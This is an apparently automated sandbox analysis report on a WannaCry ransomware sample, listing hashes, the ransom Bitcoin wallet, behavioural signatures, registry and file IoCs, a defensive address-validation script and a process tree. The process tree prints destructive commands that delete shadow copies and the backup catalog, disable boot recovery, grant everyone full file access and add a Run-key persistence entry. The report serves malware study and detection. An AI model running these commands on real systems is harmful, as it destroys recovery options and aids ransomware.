Analysis
max time kernel: 152s
max time network: 150s
platform: windows7_x64
resource: win7v200722
submitted: 18-09-2020 00:15
Static task: static1
Behavioral task: behavioral1
  Sample: 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
  Resource: win10v200722
General
Target: 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Size: 3.6MB
MD5: d5dcd28612f4d6ffca0cfeaefd606bcf
SHA1: cf60fa60d2f461dddfdfcebf16368e6b539cd9ba
SHA256: 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf
SHA512: dbfcf464c3211b7454c406a9f9532c416910ac24ea862d7061e3503f294d690b4957020dcc703984449e0934c7a595cf9061412fa25383850dd86235648ac23b
Malware Config
Extracted from: C:\ProgramData\mpvxsxzo192\@Please_Read_Me@.txt
Family: wannacry
Bitcoin wallet: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
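The extracted config is just the ransom-note path, the family label and one Bitcoin address. The block below is an added example, not part of the sandbox report or of the WannaCry sample: a small extractor that pulls candidate Bitcoin addresses out of ransom-note text and keeps only those that pass Base58Check (version byte + 20-byte HASH160 + 4-byte double-SHA-256 checksum), so that a copy or OCR error in a note does not end up in an IoC feed. The note text in CONSTRUCTED_NOTE is constructed for the example; the only value taken from the page is the wallet string.

```python
import hashlib
import re
from typing import List

# Bitcoin's Base58 alphabet (no 0, O, I or l).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Wallet string from the extracted config above; the only value here taken from the report.
WANNACRY_WALLET = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94"

# Constructed ransom-note text for this example (not the real @Please_Read_Me@.txt).
# It repeats the wallet once and adds a decoy with the last two characters swapped.
CONSTRUCTED_NOTE = (
    "Send $300 worth of bitcoin to this address:\n"
    "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94\n"
    "If you already paid, send the proof to 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 again.\n"
    "Do not use 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb49, that one is a typo.\n"
)

# Loose candidate pattern: legacy P2PKH/P2SH addresses are 26-35 Base58 chars starting with 1 or 3.
ADDRESS_RE = re.compile(r"\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b")


def b58decode(s: str) -> bytes:
    """Decode Base58 into bytes; each leading '1' stands for one leading 0x00 byte."""
    n = 0
    for ch in s:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            raise ValueError(f"invalid Base58 character {ch!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def is_valid_btc_address(addr: str) -> bool:
    """Base58Check: 1 version byte + 20-byte HASH160 + 4-byte checksum = 25 bytes,
    where checksum = SHA256(SHA256(version || hash160))[:4]."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    payload, checksum = raw[:21], raw[21:]
    expected = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    return checksum == expected


def extract_wallets(text: str) -> List[str]:
    """Unique, checksum-valid addresses in order of first appearance."""
    found: List[str] = []
    for m in ADDRESS_RE.finditer(text):
        cand = m.group(0)
        if cand not in found and is_valid_btc_address(cand):
            found.append(cand)
    return found


if __name__ == "__main__":
    for w in extract_wallets(CONSTRUCTED_NOTE):
        print("wallet:", w)
```

The regex is deliberately loose (any 26-35 character Base58 token that starts with 1 or 3); it is the checksum step that drops the decoy, which is why candidate matching alone is not good enough for an indicator feed.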
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm. In this trace the submitted sample and the separately started C:\WINDOWS\mssecsvc.exe each write C:\WINDOWS\tasksche.exe; the copy at C:\ProgramData\mpvxsxzo192\tasksche.exe then runs the components listed under Downloads (the encryptor support files, the @WanaDecryptor@.exe front end and a bundled Tor client under TaskData\Tor) from that directory.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery. In this trace the chain is spawned by @WanaDecryptor@.exe vs: vssadmin delete shadows /all /quiet, wmic shadowcopy delete, two bcdedit changes that disable recovery, and wbadmin delete catalog -quiet (see the process tree below).
-
Executes dropped EXE 20 IoCs
Processes:
pid process
1880 tasksche.exe
1604 tasksche.exe
836 taskdl.exe
860 @WanaDecryptor@.exe
2028 @WanaDecryptor@.exe
1476 taskhsvc.exe
1340 taskse.exe
2024 taskdl.exe
1504 @WanaDecryptor@.exe
1996 taskse.exe
808 taskdl.exe
800 @WanaDecryptor@.exe
1356 taskse.exe
316 @WanaDecryptor@.exe
1848 taskdl.exe
2276 taskse.exe
2304 @WanaDecryptor@.exe
2324 taskdl.exe
2408 tasksche.exe
2444 tasksche.exe
-
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
description ioc process
File created C:\Users\Admin\Pictures\SetDeny.raw.WNCRYT tasksche.exe
File renamed C:\Users\Admin\Pictures\SetDeny.raw.WNCRYT => C:\Users\Admin\Pictures\SetDeny.raw.WNCRY tasksche.exe
File opened for modification C:\Users\Admin\Pictures\SetDeny.raw.WNCRY tasksche.exe
-
Drops startup file 2 IoCs
The IoCs are temporary files written into two startup directories while tasksche.exe was working through them; the confirmed persistence mechanism in this trace is the Run key listed below.
Processes:
description ioc process
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD6A58.tmp tasksche.exe
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD6A06.tmp tasksche.exe
-
Loads dropped DLL 27 IoCs
Processes:
pid process (load events)
1604 tasksche.exe (x13)
1836 cscript.exe
2024 cmd.exe
860 @WanaDecryptor@.exe (x2)
1476 taskhsvc.exe (x6)
1340 taskse.exe
1996 taskse.exe
1356 taskse.exe
2276 taskse.exe
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
pid process
2480 icacls.exe
1928 icacls.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials. No IoCs are attached to this signature in this report.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
description ioc process
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\mpvxsxzo192 = "\"C:\\ProgramData\\mpvxsxzo192\\tasksche.exe\"" reg.exe
-
JavaScript code in executable 7 IoCs
The "js" YARA rule fires on strings inside the bundled Tor client and its OpenSSL library (tor.exe, taskhsvc.exe, LIBEAY32.dll), most likely a loose string match rather than embedded JavaScript; treat this signature as noise for this sample.
Processes:
resource yara_rule
\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe js
\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe js
C:\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe js
C:\ProgramData\mpvxsxzo192\TaskData\Tor\LIBEAY32.dll js
\ProgramData\mpvxsxzo192\TaskData\Tor\libeay32.dll js
C:\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe js
C:\ProgramData\mpvxsxzo192\TaskData\Tor\tor.exe js
-
Drops file in System32 directory 8 IoCs
All of these paths sit under C:\Windows\SysWOW64\config\systemprofile, the profile directory of the LocalSystem account, so taskhsvc.exe (the bundled Tor client) and mssecsvc.exe are running as SYSTEM here. The tor\cached-*, state and lock files are Tor's normal data directory, not encrypted output.
Processes:
description ioc process
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp taskhsvc.exe
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp taskhsvc.exe
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp taskhsvc.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new taskhsvc.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat mssecsvc.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\lock taskhsvc.exe
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\tor\state.tmp taskhsvc.exe
-
Modifies service 2 TTPs 4 IoCs
These keys are written by the Volume Shadow Copy service itself (vssvc.exe) as it services the deletion requests from vssadmin.exe and WMIC.exe; they are VSS writer diagnostics, not a service created by the malware.
Processes:
description ioc process
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
description ioc process
Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" @WanaDecryptor@.exe
-
Drops file in Windows directory 2 IoCs
Processes:
description ioc process
File created C:\WINDOWS\tasksche.exe 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
File created C:\WINDOWS\tasksche.exe mssecsvc.exe
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid process
808 vssadmin.exe
-
Modifies data under HKEY_USERS 48 IoCs
All of these writes go to HKU\.DEFAULT, the hive used by the SYSTEM account, and are WinINet proxy/WPAD auto-detect, zone-map and cache-prefix settings: the ordinary side effect of a service process initialising WinINet, consistent with the systemprofile paths above. The cscript.exe entries are Windows Script Host and WinTrust defaults created when m.vbs runs. None of them is ransomware configuration.
Processes:
description ioc process
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDetectedUrl mssecsvc.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\WpadDecisionTime = 80165021618dd601 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\32-e2-17-db-d2-77 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Key created \REGISTRY\USER\.DEFAULT\Software cscript.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings mssecsvc.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings cscript.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings mssecsvc.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a0700b4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections mssecsvc.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\32-e2-17-db-d2-77 mssecsvc.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1" mssecsvc.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\WpadDecisionReason = "1" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad mssecsvc.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77 mssecsvc.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\WpadDecision = "0" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a0700b4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mssecsvc.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix mssecsvc.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" mssecsvc.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3} 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B0B3A07F-52FE-4CB4-B180-D347A88145E3}\WpadNetworkName = "Network" 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings cscript.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" mssecsvc.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mssecsvc.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" mssecsvc.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = 80165021618dd601 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft cscript.exe
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host cscript.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cscript.exe
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" mssecsvc.exe
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = 80165021618dd601 mssecsvc.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" mssecsvc.exe
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0" mssecsvc.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
Processes:
pid process
1604 tasksche.exe
2444 tasksche.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
pid process
1476 taskhsvc.exe (x3)
-
Suspicious use of AdjustPrivilegeToken 35 IoCs
taskse.exe enabling SeTcbPrivilege is consistent with its role in the tree below: it is the launcher that starts @WanaDecryptor@.exe, and SeTcb is needed to obtain and use another session's user token. The vssvc.exe and WMIC.exe entries are the normal privilege set those components enable while servicing the shadow-copy deletion.
Processes:
description pid process
Token: SeTcbPrivilege 1340 taskse.exe (x2)
Token: SeBackupPrivilege 1816 vssvc.exe
Token: SeRestorePrivilege 1816 vssvc.exe
Token: SeAuditPrivilege 1816 vssvc.exe
Token: SeAssignPrimaryTokenPrivilege 556 WMIC.exe (x2)
Token: SeIncreaseQuotaPrivilege 556 WMIC.exe (x2)
Token: SeSecurityPrivilege 556 WMIC.exe (x2)
Token: SeTakeOwnershipPrivilege 556 WMIC.exe (x2)
Token: SeLoadDriverPrivilege 556 WMIC.exe (x2)
Token: SeSystemtimePrivilege 556 WMIC.exe (x2)
Token: SeBackupPrivilege 556 WMIC.exe (x2)
Token: SeRestorePrivilege 556 WMIC.exe (x2)
Token: SeShutdownPrivilege 556 WMIC.exe (x2)
Token: SeSystemEnvironmentPrivilege 556 WMIC.exe (x2)
Token: SeUndockPrivilege 556 WMIC.exe (x2)
Token: SeManageVolumePrivilege 556 WMIC.exe (x2)
Token: SeTcbPrivilege 1996 taskse.exe (x2)
Token: SeTcbPrivilege 1356 taskse.exe (x2)
Token: SeTcbPrivilege 2276 taskse.exe (x2)
-
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
pid process
860 @WanaDecryptor@.exe (x2)
2028 @WanaDecryptor@.exe (x2)
1504 @WanaDecryptor@.exe (x2)
800 @WanaDecryptor@.exe
316 @WanaDecryptor@.exe
2304 @WanaDecryptor@.exe
-
Suspicious use of WriteProcessMemory 128 IoCs (64 of the 128 entries are listed on this page; each parent/child pair appears four times)
Processes:
description pid process target process
PID 1420 wrote to memory of 1880: 32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe -> tasksche.exe (x4)
PID 1740 wrote to memory of 1604: cmd.exe -> tasksche.exe (x4)
PID 1604 wrote to memory of 1668: tasksche.exe -> attrib.exe (x4)
PID 1604 wrote to memory of 1928: tasksche.exe -> icacls.exe (x4)
PID 1604 wrote to memory of 836: tasksche.exe -> taskdl.exe (x4)
PID 1604 wrote to memory of 308: tasksche.exe -> cmd.exe (x4)
PID 308 wrote to memory of 1836: cmd.exe -> cscript.exe (x4)
PID 1604 wrote to memory of 860: tasksche.exe -> @WanaDecryptor@.exe (x4)
PID 1604 wrote to memory of 2024: tasksche.exe -> cmd.exe (x4)
PID 2024 wrote to memory of 2028: cmd.exe -> @WanaDecryptor@.exe (x4)
PID 860 wrote to memory of 1476: @WanaDecryptor@.exe -> taskhsvc.exe (x4)
PID 1604 wrote to memory of 1340: tasksche.exe -> taskse.exe (x4)
PID 1604 wrote to memory of 948: tasksche.exe -> cmd.exe (x4)
PID 1604 wrote to memory of 2024: tasksche.exe -> taskdl.exe (x4)
PID 948 wrote to memory of 1060: cmd.exe -> reg.exe (x4)
PID 2028 wrote to memory of 1928: @WanaDecryptor@.exe -> cmd.exe (x4)
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
pid process
1668 attrib.exe
2460 attrib.exe
Processes
Each entry gives the image path, the command line as executed, and the signatures attributed to that process; indentation and the bracketed number show the depth in the process tree.

[1] C:\Users\Admin\AppData\Local\Temp\32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe"
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
  [2] C:\WINDOWS\tasksche.exe
      cmdline: C:\WINDOWS\tasksche.exe /i
      - Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\Temp\32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\32f24601153be0885f11d62e0a8a2f0280a2034fc981d8184180c5d3b1b9e8cf.bin.exe -m security
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

[1] C:\Windows\system32\cmd.exe
    cmdline: cmd.exe /c "C:\ProgramData\mpvxsxzo192\tasksche.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\ProgramData\mpvxsxzo192\tasksche.exe
      cmdline: C:\ProgramData\mpvxsxzo192\tasksche.exe
      - Executes dropped EXE
      - Modifies extensions of user files
      - Drops startup file
      - Loads dropped DLL
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\attrib.exe
        cmdline: attrib +h .
        - Views/modifies file attributes
    [3] C:\Windows\SysWOW64\icacls.exe
        cmdline: icacls . /grant Everyone:F /T /C /Q
        - Modifies file permissions
    [3] C:\ProgramData\mpvxsxzo192\taskdl.exe
        cmdline: taskdl.exe
        - Executes dropped EXE
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd /c 175431600395137.bat
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cscript.exe
          cmdline: cscript.exe //nologo m.vbs
          - Loads dropped DLL
          - Modifies data under HKEY_USERS
    [3] C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
        cmdline: @WanaDecryptor@.exe co
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
      [4] C:\ProgramData\mpvxsxzo192\TaskData\Tor\taskhsvc.exe
          cmdline: TaskData\Tor\taskhsvc.exe
          - Executes dropped EXE
          - Loads dropped DLL
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
          cmdline: @WanaDecryptor@.exe vs
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\cmd.exe
            cmdline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          [6] C:\Windows\SysWOW64\vssadmin.exe
              cmdline: vssadmin delete shadows /all /quiet
              - Interacts with shadow copies
          [6] C:\Windows\SysWOW64\Wbem\WMIC.exe
              cmdline: wmic shadowcopy delete
              - Suspicious use of AdjustPrivilegeToken
    [3] C:\ProgramData\mpvxsxzo192\taskse.exe
        cmdline: taskse.exe C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
          cmdline: "C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"
          - Executes dropped EXE
          - Sets desktop wallpaper using registry
          - Suspicious use of SetWindowsHookEx
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mpvxsxzo192" /t REG_SZ /d "\"C:\ProgramData\mpvxsxzo192\tasksche.exe\"" /f
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\reg.exe
          cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "mpvxsxzo192" /t REG_SZ /d "\"C:\ProgramData\mpvxsxzo192\tasksche.exe\"" /f
          - Adds Run key to start application
          - Modifies registry key
    [3] C:\ProgramData\mpvxsxzo192\taskdl.exe
        cmdline: taskdl.exe
        - Executes dropped EXE
    [3] C:\ProgramData\mpvxsxzo192\taskse.exe
        cmdline: taskse.exe C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe
          cmdline: "C:\ProgramData\mpvxsxzo192\@WanaDecryptor@.exe"
